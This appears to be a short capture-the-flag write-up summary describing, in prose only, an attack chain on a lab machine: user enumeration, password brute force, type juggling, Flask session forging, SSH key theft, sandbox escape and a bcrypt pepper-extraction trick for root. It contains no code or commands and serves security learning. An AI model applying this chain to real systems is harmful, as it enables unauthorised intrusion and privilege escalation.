Newsletter 22/02/2023
This machine has a website vulnerable to user enumeration. Then we can use brute force a user’s password and run containers. Using a container we can access an internal website that has an API that shows sensitive information using Type Juggling and has a feature for matching regular expressions on given files, so that we can read source code and get the secret key for Flask. Then, we can forge a session for user jack and find out that the Docker containers allow to access process information from the machine, and we can read the private SSH key of this user. Next, we can run a custom Python interpreter and escape the sandbox to get a shell as jack_adm. Finally, we have a tool to generate hashes with bcrypt, and we need to exploit a limitation of bcrypt to extract a secret pepper string and then crack root’s hash in order to escalate privileges
USB HID analysis. Decoding key strokes
RSA. Euler's totient function. AES decryption